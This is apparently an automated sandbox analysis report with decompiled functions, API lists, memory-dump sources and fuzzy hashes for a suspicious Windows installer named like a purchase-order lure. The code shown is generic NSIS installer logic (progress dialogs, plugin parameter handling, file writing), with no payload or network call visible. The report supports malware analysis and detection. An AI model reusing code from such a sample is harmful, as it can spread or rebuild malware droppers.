0x00406394
0x00000000
0x00000000
0x00000000
0x00406394
0x00406399

APIs

CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe" ,77313410,C:\Users\user\AppData\Local\Temp\,00000000,004032E8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403521,?,00000006,00000008,0000000A), ref: 0040635B
CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406368
CharNextA.USER32(?,"C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe" ,77313410,C:\Users\user\AppData\Local\Temp\,00000000,004032E8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403521,?,00000006,00000008,0000000A), ref: 0040636D
CharPrevA.USER32(?,?,77313410,C:\Users\user\AppData\Local\Temp\,00000000,004032E8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403521,?,00000006,00000008,0000000A), ref: 0040637D

Strings

"C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe" , xrefs: 0040633F
*?|<>/":, xrefs: 0040634B
C:\Users\user\AppData\Local\Temp\, xrefs: 00406304

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-3742006132
Opcode ID: b04103f1c3b5c2dc28f3c9fe732184cb0b910e084cb0e1e3de7299130b8356f6
Instruction ID: aaadfa82e77317605f3281ec64e2e7980eb4a55dd70e9bd95d11bcdf30b36afc
Opcode Fuzzy Hash: b04103f1c3b5c2dc28f3c9fe732184cb0b910e084cb0e1e3de7299130b8356f6
Instruction Fuzzy Hash: 6011826180479129EB3216384C44BBBAFD84B57760F5A407FEDC6722C2D67C6C6286AD

Uniqueness

Uniqueness Score: -1.00%

Function 004041C1 Relevance: 12.1, APIs: 8, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004041C1(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}

0x004041d3
0x00404267
0x00000000
0x00404267
0x004041e4
0x004041e8
0x00000000
0x00000000
0x004041ee
0x004041f7
0x004041fa
0x004041fa
0x00404200
0x00404206
0x00404206
0x00404212
0x00404218
0x0040421f
0x00404222
0x00404225
0x00404227
0x00404227
0x0040422f
0x00404235
0x00404235
0x0040423f
0x00404244
0x00404247
0x0040424c
0x0040424f
0x0040424f
0x0040425f
0x0040425f
0x00000000

APIs

GetWindowLongA.USER32(?,000000EB), ref: 004041DE
GetSysColor.USER32(00000000), ref: 004041FA
SetTextColor.GDI32(?,00000000), ref: 00404206
SetBkMode.GDI32(?,?), ref: 00404212
GetSysColor.USER32(?), ref: 00404225
SetBkColor.GDI32(?,?), ref: 00404235
DeleteObject.GDI32(?), ref: 0040424F
CreateBrushIndirect.GDI32(?), ref: 00404259

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: ae3d8a9df92c775f8f54e71e017c7c1ec6869770dfd215418e325c2b67ca61e7
Instruction ID: ef1bd211f687dc199c5e2a556594d88cbafbffeaa14e1023ebc7d04ec3d96a61
Opcode Fuzzy Hash: ae3d8a9df92c775f8f54e71e017c7c1ec6869770dfd215418e325c2b67ca61e7
Instruction Fuzzy Hash: A32184B1504704ABC7219F78DD08B5BBBF8AF81714F04896DFAD5E26A0D734E944CB64

Uniqueness

Uniqueness Score: -1.00%

Function 100023D8 Relevance: 10.6, APIs: 7, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E100023D8(intOrPtr* _a4) {
				char _v80;
				intOrPtr _v84;
				short _v92;
				intOrPtr* _t22;
				void* _t24;
				intOrPtr _t25;
				signed int _t33;
				void* _t37;
				intOrPtr _t38;
				void* _t41;

				_t37 = E10001215();
				_t22 = _a4;
				_t38 =  *((intOrPtr*)(_t22 + 0x814));
				_v84 = _t38;
				_t41 = (_t38 + 0x41 << 5) + _t22;
				do {
					if( *((intOrPtr*)(_t41 - 4)) != 0xffffffff) {
					}
					_t33 =  *(_t41 - 8);
					if(_t33 <= 7) {
						switch( *((intOrPtr*)(_t33 * 4 +  &M100024FB))) {
							case 0:
								 *_t37 = 0;
								goto L15;
							case 1:
								_push( *__eax);
								goto L13;
							case 2:
								__eax = E10001429(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L14;
							case 3:
								__eax = lstrcpynA(__edi,  *__eax,  *0x1000405c);
								goto L15;
							case 4:
								__ecx =  *0x1000405c;
								__edx = __ecx - 1;
								__eax = WideCharToMultiByte(__ebx, __ebx,  *__eax, __ecx, __edi, __edx, __ebx, __ebx);
								__eax =  *0x1000405c;
								 *((char*)(__eax + __edi - 1)) = __bl;
								goto L15;
							case 5:
								__ecx =  &_v80;
								_push(0x27);
								_push( &_v80);
								_push( *__eax);
								__imp__StringFromGUID2();
								__eax =  &_v92;
								__eax = WideCharToMultiByte(__ebx, __ebx,  &_v92,  &_v92, __edi,  *0x1000405c, __ebx, __ebx);
								goto L15;
							case 6:
								_push( *__esi);
								L13:
								__eax = wsprintfA(__edi, 0x10004000);
								L14:
								__esp = __esp + 0xc;
								goto L15;
						}
					}
					L15:
					_t24 =  *(_t41 + 0x14);
					if(_t24 != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t41 - 4)) > 0)) {
						GlobalFree(_t24);
					}
					_t25 =  *((intOrPtr*)(_t41 + 0xc));
					if(_t25 != 0) {
						if(_t25 != 0xffffffff) {
							if(_t25 > 0) {
								E100012D1(_t25 - 1, _t37);
								goto L24;
							}
						} else {
							E10001266(_t37);
							L24:
						}
					}
					_v84 = _v84 - 1;
					_t41 = _t41 - 0x20;
				} while (_v84 >= 0);
				return GlobalFree(_t37);
			}

0x100023e4
0x100023e6
0x100023f0
0x100023f6
0x10002400
0x10002404
0x10002408
0x10002408
0x10002410
0x10002416
0x1000241c
0x00000000
0x10002423
0x00000000
0x00000000
0x10002427
0x00000000
0x00000000
0x10002431
0x00000000
0x00000000
0x10002441
0x00000000
0x00000000
0x1000246d
0x10002475
0x1000247f
0x10002481
0x10002486
0x00000000
0x00000000
0x10002449
0x1000244d
0x1000244f
0x10002450
0x10002452
0x10002462
0x10002469
0x00000000
0x00000000
0x1000248c
0x1000248e
0x10002494
0x1000249a
0x1000249a
0x00000000
0x00000000
0x1000241c
0x1000249d
0x1000249d
0x100024a2
0x100024b3
0x100024b3
0x100024b9
0x100024be
0x100024c3
0x100024cf
0x100024d4
0x00000000
0x100024d9
0x100024c5
0x100024c6
0x100024da
0x100024da
0x100024c3
0x100024db
0x100024df
0x100024e2
0x100024fa

APIs

Part of subcall function 10001215: GlobalAlloc.KERNEL32(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D

GlobalFree.KERNEL32(?), ref: 100024B3
GlobalFree.KERNEL32(00000000), ref: 100024ED

Memory Dump Source

Source File: 00000002.00000002.23343286065.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.23343244782.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.23343346960.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.23343388834.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 9b8f7426cd7417a05f7efaca6ab9ef20acf91f7aea9c9defdea317c740d0f0ba
Instruction ID: c0db1d51d0d8beb2da32add46ec64f24e8f484468aa98c5ce89375ba0c102a5a
Opcode Fuzzy Hash: 9b8f7426cd7417a05f7efaca6ab9ef20acf91f7aea9c9defdea317c740d0f0ba
Instruction Fuzzy Hash: 0831A9B1504211EFF322DB94CCC4C2B7BBDEB853D4B118929FA4193228CB31AC94DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00402CF9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402CF9(intOrPtr _a4) {
				char _v68;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x4178e4; // 0x0
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x4178e4 = 0;
					return _t15;
				}
				__eflags =  *0x4178e4; // 0x0
				if(__eflags != 0) {
					return E0040646D(0);
				}
				_t6 = GetTickCount();
				__eflags = _t6 -  *0x424730;
				if(_t6 >  *0x424730) {
					__eflags =  *0x424728;
					if( *0x424728 == 0) {
						_t7 = CreateDialogParamA( *0x424720, 0x6f, 0, E00402C61, 0);
						 *0x4178e4 = _t7;
						return ShowWindow(_t7, 5);
					}
					__eflags =  *0x4247f4 & 0x00000001;
					if(( *0x4247f4 & 0x00000001) != 0) {
						wsprintfA( &_v68, "... %d%%", E00402CDD());
						return E004051C0(0,  &_v68);
					}
				}
				return _t6;
			}

0x00402d05
0x00402d07
0x00402d0e
0x00402d11
0x00402d11
0x00402d17
0x00000000
0x00402d17
0x00402d1f
0x00402d25
0x00000000
0x00402d28
0x00402d2f
0x00402d35
0x00402d3b
0x00402d3d
0x00402d43
0x00402d81
0x00402d8a
0x00000000
0x00402d8f
0x00402d45
0x00402d4c
0x00402d5d
0x00000000
0x00402d6b
0x00402d4c
0x00402d97

APIs

DestroyWindow.USER32(00000000,00000000), ref: 00402D11
GetTickCount.KERNEL32 ref: 00402D2F
wsprintfA.USER32 ref: 00402D5D

Part of subcall function 004051C0: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D70,00000000,?), ref: 004051F9
Part of subcall function 004051C0: lstrlenA.KERNEL32(00402D70,Skipped: C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D70,00000000), ref: 00405209
Part of subcall function 004051C0: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp\System.dll,00402D70,00402D70,Skipped: C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp\System.dll,00000000,00000000,00000000), ref: 0040521C
Part of subcall function 004051C0: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp\System.dll), ref: 0040522E
Part of subcall function 004051C0: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405254
Part of subcall function 004051C0: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040526E
Part of subcall function 004051C0: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040527C

CreateDialogParamA.USER32(0000006F,00000000,00402C61,00000000), ref: 00402D81
ShowWindow.USER32(00000000,00000005), ref: 00402D8F

Part of subcall function 00402CDD: MulDiv.KERNEL32(00008000,00000064,00001559), ref: 00402CF2

Strings

... %d%%, xrefs: 00402D57

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: 29f14afc1eacec068b050b43fe7c2713e2b8c303e0bcf1944afa507be0b4a5e5
Instruction ID: 05ae4936d853d48bc68e56bc5a14e51e8e164cb381f888baae312624535d0e7d
Opcode Fuzzy Hash: 29f14afc1eacec068b050b43fe7c2713e2b8c303e0bcf1944afa507be0b4a5e5
Instruction Fuzzy Hash: 3601D630901620EBD722AB60BF0CEDE7A78EF48701B44003BF555B51E4CBB84C41CA9E

Uniqueness

Uniqueness Score: -1.00%

Function 00404A8B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404A8B(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x00404a99
0x00404aa6
0x00404aac
0x00404aea
0x00404aea
0x00404af9
0x00404b00
0x00000000
0x00404b02
0x00404aae
0x00404abd
0x00404ac5
0x00404ac8
0x00404ada
0x00404ae0
0x00404ae7
0x00000000
0x00404ae7
0x00000000

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404AA6
GetMessagePos.USER32 ref: 00404AAE
ScreenToClient.USER32(?,?), ref: 00404AC8
SendMessageA.USER32(?,00001111,00000000,?), ref: 00404ADA
SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404B00

Strings

f, xrefs: 00404ADC

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
Instruction ID: d6f0acc73841e927dc0e8d5cbc3229ede44acf808998aa5f41192725d6cd764a
Opcode Fuzzy Hash: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
Instruction Fuzzy Hash: 03019275900219BADB00DB95CD81BFFBBBCAF45711F10012BBA10B61C0C7B495018F94

Uniqueness

Uniqueness Score: -1.00%

Function 00402C61 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402C61(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				void* _t11;
				CHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00402CDD();
					_t19 = "unpacking data: %d%%";
					if( *0x424734 == 0) {
						_t19 = "verifying installer: %d%%";
					}
					wsprintfA( &_v68, _t19, _t11);
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}

0x00402c6e
0x00402c7c
0x00402c82
0x00402c82
0x00402c90
0x00402c92
0x00402c9e
0x00402ca3
0x00402ca5
0x00402ca5
0x00402cb0
0x00402cc0
0x00402cd2
0x00402cd2
0x00402cda

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C7C
wsprintfA.USER32 ref: 00402CB0
SetWindowTextA.USER32(?,?), ref: 00402CC0
SetDlgItemTextA.USER32(?,00000406,?), ref: 00402CD2

Strings

unpacking data: %d%%, xrefs: 00402C9E
verifying installer: %d%%, xrefs: 00402CA5, 00402CAE

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: fd6d30a01278415fece07758d049025ae65b55165fa63b5b41d509ea3c6516ac
Instruction ID: dd36d9f71d3f98b31449e9fd5fd6fbb92ab2983ffa1af0ce52afe90c4e52f268
Opcode Fuzzy Hash: fd6d30a01278415fece07758d049025ae65b55165fa63b5b41d509ea3c6516ac
Instruction Fuzzy Hash: B6F03C7150020CFBEF209F61CE0ABAE7769EB44344F00803AFA16B52D0DBB999559F99

Uniqueness

Uniqueness Score: -1.00%

Function 100021FA Relevance: 9.1, APIs: 6, Instructions: 137
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E100021FA(void* __edx, intOrPtr _a4) {
				signed int _v4;
				void* _t36;
				signed int _t37;
				void* _t38;
				void* _t41;
				void* _t46;
				signed int* _t48;
				signed int* _t49;

				_v4 = 0 |  *((intOrPtr*)(_a4 + 0x814)) > 0x00000000;
				while(1) {
					_t9 = _a4 + 0x818; // 0x818
					_t49 = (_v4 << 5) + _t9;
					_t36 = _t49[6];
					if(_t36 == 0) {
						goto L9;
					}
					_t46 = 0x1a;
					if(_t36 == _t46) {
						goto L9;
					}
					if(_t36 != 0xffffffff) {
						if(_t36 <= 0 || _t36 > 0x19) {
							_t49[6] = _t46;
						} else {
							_t36 = E100012AD(_t36 - 1);
							L10:
						}
						goto L11;
					} else {
						_t36 = E1000123B();
						L11:
						_t41 = _t36;
						_t13 =  &(_t49[2]); // 0x820
						_t48 = _t13;
						if(_t49[1] != 0xffffffff) {
						}
						_t37 =  *_t49;
						_t49[7] = _t49[7] & 0x00000000;
						if(_t37 > 7) {
							L27:
							_t38 = GlobalFree(_t41);
							if(_v4 == 0) {
								return _t38;
							}
							if(_v4 !=  *((intOrPtr*)(_a4 + 0x814))) {
								_v4 = _v4 + 1;
							} else {
								_v4 = _v4 & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t37 * 4 +  &M1000237E))) {
								case 0:
									 *_t48 =  *_t48 & 0x00000000;
									goto L27;
								case 1:
									__eax = E100012FE(__ebx);
									goto L20;
								case 2:
									 *__ebp = E100012FE(__ebx);
									_a4 = __edx;
									goto L27;
								case 3:
									__eax = E10001224(__ebx);
									 *(__esi + 0x1c) = __eax;
									L20:
									 *__ebp = __eax;
									goto L27;
								case 4:
									 *0x1000405c =  *0x1000405c +  *0x1000405c;
									__edi = GlobalAlloc(0x40,  *0x1000405c +  *0x1000405c);
									 *0x1000405c = MultiByteToWideChar(0, 0, __ebx,  *0x1000405c, __edi,  *0x1000405c);
									if( *__esi != 5) {
										 *(__esi + 0x1c) = __edi;
										 *__ebp = __edi;
									} else {
										__eax = GlobalAlloc(0x40, 0x10);
										_push(__eax);
										 *(__esi + 0x1c) = __eax;
										_push(__edi);
										 *__ebp = __eax;
										__imp__CLSIDFromString();
										__eax = GlobalFree(__edi);
									}
									goto L27;
								case 5:
									if( *__ebx != 0) {
										__eax = E100012FE(__ebx);
										 *__edi = __eax;
									}
									goto L27;
								case 6:
									__esi =  *(__esi + 0x18);
									__esi = __esi - 1;
									__esi = __esi *  *0x1000405c;
									__esi = __esi +  *0x10004064;
									__eax = __esi + 0xc;
									 *__edi = __esi + 0xc;
									asm("cdq");
									__eax = E10001429(__edx, __esi + 0xc, __edx, __esi);
									goto L27;
							}
						}
					}
					L9:
					_t36 = E10001224(0x10004034);
					goto L10;
				}
			}

0x1000220e
0x10002212
0x1000221d
0x1000221d
0x10002224
0x10002229
0x00000000
0x00000000
0x1000222d
0x10002230
0x00000000
0x00000000
0x10002235
0x10002240
0x10002250
0x10002247
0x10002249
0x1000225f
0x1000225f
0x00000000
0x10002237
0x10002237
0x10002260
0x10002264
0x10002266
0x10002266
0x10002269
0x10002269
0x10002271
0x10002273
0x1000227a
0x10002347
0x10002348
0x10002353
0x1000237d
0x1000237d
0x10002363
0x1000236f
0x10002365
0x10002365
0x10002365
0x00000000
0x10002280
0x10002280
0x00000000
0x10002287
0x00000000
0x00000000
0x10002290
0x00000000
0x00000000
0x1000229e
0x100022a1
0x00000000
0x00000000
0x100022aa
0x100022af
0x100022b2
0x100022b3
0x00000000
0x00000000
0x100022c0
0x100022cb
0x100022da
0x100022e3
0x10002306
0x10002309
0x100022e5
0x100022e9
0x100022ef
0x100022f0
0x100022f3
0x100022f4
0x100022f7
0x100022fe
0x100022fe
0x00000000
0x00000000
0x10002311
0x10002314
0x10002320
0x10002322
0x00000000
0x00000000
0x10002325
0x10002328
0x10002329
0x10002330
0x10002337
0x1000233a
0x1000233c
0x1000233f
0x00000000
0x00000000
0x10002280
0x1000227a
0x10002255
0x1000225a
0x00000000
0x1000225a

APIs

GlobalFree.KERNEL32(00000000), ref: 10002348

Part of subcall function 10001224: lstrcpynA.KERNEL32(00000000,?,100012CF,-1000404B,100011AB,-000000A0), ref: 10001234

GlobalAlloc.KERNEL32(00000040,?), ref: 100022C5
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 100022DA
GlobalAlloc.KERNEL32(00000040,00000010), ref: 100022E9
CLSIDFromString.OLE32(00000000,00000000), ref: 100022F7
GlobalFree.KERNEL32(00000000), ref: 100022FE

Memory Dump Source

Source File: 00000002.00000002.23343286065.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.23343244782.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.23343346960.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.23343388834.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
String ID:
API String ID: 3730416702-0
Opcode ID: 0f1d2088a070cebd5915530b0a964975e4ea41447dfd67459970790859c4aece
Instruction ID: a642113aa4013a2ca06c871554e8d399cf46bf4099943ddf9e0960cc50565d32
Opcode Fuzzy Hash: 0f1d2088a070cebd5915530b0a964975e4ea41447dfd67459970790859c4aece
Instruction Fuzzy Hash: A941BCB1508311EFF320DF648C84B6AB7E8FF443D0F11892AF946D61A9DB34AA40CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00402736 Relevance: 9.1, APIs: 6, Instructions: 86
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00402736(void* __ebx) {
				void* _t26;
				long _t31;
				void* _t45;
				void* _t49;
				void* _t51;
				void* _t54;
				void* _t55;
				void* _t56;

				_t45 = __ebx;
				 *((intOrPtr*)(_t56 - 0xc)) = 0xfffffd66;
				_t50 = E00402AC1(0xfffffff0);
				 *(_t56 - 0x34) = _t23;
				if(E00405A9E(_t50) == 0) {
					E00402AC1(0xffffffed);
				}
				E00405C0D(_t50);
				_t26 = E00405C32(_t50, 0x40000000, 2);
				 *(_t56 + 8) = _t26;
				if(_t26 != 0xffffffff) {
					_t31 =  *0x424738;
					 *(_t56 - 0x30) = _t31;
					_t49 = GlobalAlloc(0x40, _t31);
					if(_t49 != _t45) {
						E004032C5(_t45);
						E004032AF(_t49,  *(_t56 - 0x30));
						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
						 *(_t56 - 0x3c) = _t54;
						if(_t54 != _t45) {
							E0040303E(_t47,  *((intOrPtr*)(_t56 - 0x24)), _t45, _t54,  *(_t56 - 0x20));
							while( *_t54 != _t45) {
								_t47 =  *_t54;
								_t55 = _t54 + 8;
								 *(_t56 - 0x84) =  *_t54;
								E00405BED( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
								_t54 = _t55 +  *(_t56 - 0x84);
							}
							GlobalFree( *(_t56 - 0x3c));
						}
						E00405CD9( *(_t56 + 8), _t49,  *(_t56 - 0x30));
						GlobalFree(_t49);
						 *((intOrPtr*)(_t56 - 0xc)) = E0040303E(_t47, 0xffffffff,  *(_t56 + 8), _t45, _t45);
					}
					CloseHandle( *(_t56 + 8));
				}
